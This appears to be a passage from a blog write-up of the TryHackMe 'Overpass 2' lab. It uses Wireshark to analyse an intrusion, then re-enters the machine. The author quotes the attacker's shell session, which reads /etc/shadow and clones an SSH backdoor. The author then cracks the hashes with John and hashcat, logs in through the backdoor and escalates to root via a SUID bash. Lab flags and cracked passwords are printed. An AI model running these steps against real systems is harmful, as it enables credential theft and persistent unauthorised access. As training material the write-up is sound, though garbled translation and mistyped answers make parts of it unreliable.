Right-click on the very first TCP packet and select Follow > TCP Street. You can see that "/development/" was used.
Answer
What payload did the attacker use to gain access?
Let's check the following TCP packet: It appears that you uploaded a file called "payload.php" using "/development/upload.php". I was also able to see that payload.php contains a reverse shell.
Answer
What password did the attacker use to privacy?
There was a password used in another TCP packet. There is also information about what the attacker did.
/bin/sh: 0: can't access tty; job controlled turn off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh ls -lAh total 8.0K -rw-r--r-- 1 www-data 51 Jul 21 17:48 .overpass -rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass cat .overpass ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james su james Password: whenevernoteartinstant james@overpass-production:/var/www/html/development/uploads$ cd ~ cd ~ james@overpass-production:~$ sudo -l] sudo -l] sudo: invalid option -- ']' usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command> ] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ... james@overpass-production:~$ sudo -l sudo -l [sudo] password for james: whenevernoteartinstant Matching Defaults entries for james on overpass-production: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/sbin\:/sbin\:/snap/bin User james may run the following commands on overpass-production: (ALL : ALL) ALL james@overpass-production:~$ sudo cat /etc/shadow sudo cat /etc/shadow root:*:18295:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: sshd:*:18464:0:99999:7::: james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::: paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
Use the id command to check the identification information such as user ID, user name, group ID, group name, etc.
Using python, import the pty module to generate a new, more stable shell
Check .overpass
Use the su command to switch to james (privilege escalation)
After escalating privileges to james, use sudo -l to check which commands can be executed with root privileges (confirm that all commands are permitted)
Check the hash saved in the /etc/shadow file
Clone ssh-backdoor
Using ssh-keygen to generate public and private keys for SSH
Run ssh-backdoor (2222 will cause the backdoor to be running)
For now, I'm being asked for my password, so the answer is "whenevernoteartinstant."
Answer
How did the attacker establish persistence?
Persistence is ssh-backdoor. It seems that you are asking for the github URL, so the answer is the command section below.
root@ip-10-10-248-79:~# /sbin/john --wordlist=/usr/share/wordlists/fasttrack.txt johnpass Created directory: /root/.john Using default input encoding: UTF-8 Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status secret12 (bee) abcd123 (szymex) 1qaz2wsx (muirland) secuirty3 (paradox) 4g 0:00:00:00 DONE (2023-08-12 15:14) 7.407g/s 411.1p/s 2055c/s 2055C/s Spring2017..starwars Use the "--show" option to display all of the cracked passwords reliably Session completed.
The answers are these four.
bee: secret12
szymex:absc123
muirland: 1qaz2wsx
paradox: securety3
Answer
Research – Analyse the code
Next, let's analyze the ssh-backdoor code.
What's the default hash for the backdoor?
It appears that ssh-backdoor has a default hash set. Let's take a look at the code in person.
What was the hash that the attacker used? – go back to the PCAP for this!
They are being asked what hashes actually used by the attacker. Looking at Wireshark, the following seems to be the actual hash I used:
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
Answer
Crack the hash using rockyou and a cracking tool of your choice. What's the password?
You can see below that sha512 hash is created using password and salt.
Use the saved text and rockyou.txt to crack your password.
┌──(root㉿kali)-[~/work] └─# hashcat -m 1710 -a 0 -o crackedpass.txt hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ==== * Device #1: pthread-Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz, 1441/2946 MB (512 MB allocatable), 2MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Early-Skip * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash * Uses-64-Bit ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 0 MB Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 3 secs Session.....: hashcat Status.....: Cracked Hash.Mode.....: 1710 (sha512($pass.$salt)) Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05 Time.Started.....: Sat Aug 12 16:42:10 2023 (0 secs) Time.Estimated...: Sat Aug 12 16:42:10 2023 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1......: 215.0 kH/s (0.31ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered.....: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress......: 17408/14344385 (0.12%) Rejected......: 0/17408 (0.00%) Restore.Point......: 16896/14344385 (0.12%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: felton -> petey Started: Sat Aug 12 16:41:24 2023 Stopped: Sat Aug 12 16:42:11 2023 ┌──(root㉿kali)-[~/work] └─# cat crackedpass.txt 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
I found out that the password is "november16".
Answer
Attack – Get back in!
Now, let's try using the backdoor to break into the server.
First, select "Start Machine" and start the target server.
If it looks like this, it's OK.
The attacker defaced the website. What message did they leave as a heading?
Let's try portscanning.
┌──(root㉿kali)-[~/work] └─# nmap -sV -Pn 10.10.113.90 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-12 17:05 UTC Nmap scan report for ip-10-10-113-90.eu-west-1.compute.internal (10.10.113.90) Host is up (0.011s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0) MAC Address: 02:46:72:B1:C1:91 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
In addition to ssh, there is http, so I'll check it in my browser.
This time, you are asked for the headline, so the headline displayed is the answer. Just to be sure, check the sauce too.
Answer
What's the user flag?
Gets the user flag. I just saw that the backdoor was running on 2222, so I'll try sshing with "james:november16".
┌──(root㉿kali)-[~] └─# ssh -p 2222 james@10.10.113.90 -oHostKeyAlgorithms=+ssh-rsa The authenticity of host '[10.10.113.90]:2222 ([10.10.113.90]:2222)' can't be established. RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.113.90]:2222' (RSA) to the list of known hosts. james@10.10.113.90's password: To run a command as administrator (user "root"), use "sudo<command> ". See "man sudo_root" for details. james@overpass-production:/home/james/ssh-backdoor$
When I checked the contents of user.txt, I found a flag.
james@overpass-production:/home/james/ssh-backdoor$ ls README.md backdoor.service cooctus.png id_rsa.pub main.go backdoor build.sh id_rsa index.html setup.sh james@overpass-production:/home/james/ssh-backdoor$ cd .. james@overpass-production:/home/james$ ls ssh-backdoor user.txt www james@overpass-production:/home/james$ cat user.txt thm{d119b4fa8c497ddb0525f7ad200e6567}
What's the root flag?
Next, we'll get the root flag. James was able to use sudo -l, so when I tried to use it again, it couldn't. . . (Maybe it's because the attacker changed the settings.)
james@overpass-production:/home/james$ sudo -l [sudo] password for james:
The attacker appears to have placed a SUID copy of the /bin/bash binary in the james home directory.
james@overpass-production:/home/james$ ll -a total 1136 drwxr-xr-x 7 james james 4096 Jul 22 2020 ./ drwxr-xr-x 7 root root 4096 Jul 21 2020 ../ lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null -rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout -rw-r--- 1 james james 3771 Apr 4 2018 .bashrc drwx-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 2 james james 4096 Jul 21 2020 .cache/ drwx----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- root 1113504 Jul 22 2020 .suid_bash* drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor/ -rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt drwxrwxr-x 7 james james 4096 Jul 21 2020 www/
/bin/bash with suid set. Try running bash -help and get the same output.
ames@overpass-production:/home/james$ ./.suid_bash -help GNU bash, version 4.4.20(1)-release-(x86_64-pc-linux-gnu) Usage: ./.suid_bash [GNU long option] [option] ... ./.suid_bash [GNU long option] [option] script-file ... GNU long options: --debug --debugger --dump-po-strings --dump-strings --help --init-file --login --noediting --noprofile --norc --posix --rcfile --restricted --verbose --version Shell options: -ilrsD or -c command or -O shopt_option (invocation only) -abefhkmnptuvxBCHP or -o option Type `./.suid_bash -c "help set"' for more information about shell options. Type `./.suid_bash -c help' for more information about shell builtin commands. Use the `bashbug' command to report bugs. bash home page:<http://www.gnu.org/software/bash> General help using GNU software:<http://www.gnu.org/gethelp/>
Since suid is set, if you check GTFOBins, it seems that you can insert "-p" and run it.
.suid_bash-4.4# cd /root/ .suid_bash-4.4# ls root.txt .suid_bash-4.4# cat root.txt thm{d53b2684f169360bb9606c333873144d}
Answer
summary
This time, we analyzed packets using wireshark and analyzed ssh-backdoor intrusion. It was a little different from the common CTFs, and there was an analysis, so I enjoyed it.
This is a blog I started to study information security. As a new employee, I would be happy if you could look with a broad heart. There is also Teech Lab, which is an opportunity to study programming fun, so if you are interested in software development, be sure to take a look!
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail.jpg)
Pochip
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)
![[CVE-2019-9053] I tried hacking it using the SQL injection vulnerability in CMS Made Simple! (Python3) TryHackMe Simple CTF Writeup](https://hack-lab-256.com/wp-content/uploads/2023/05/hack-lab-256-samnail-22-300x169.jpg)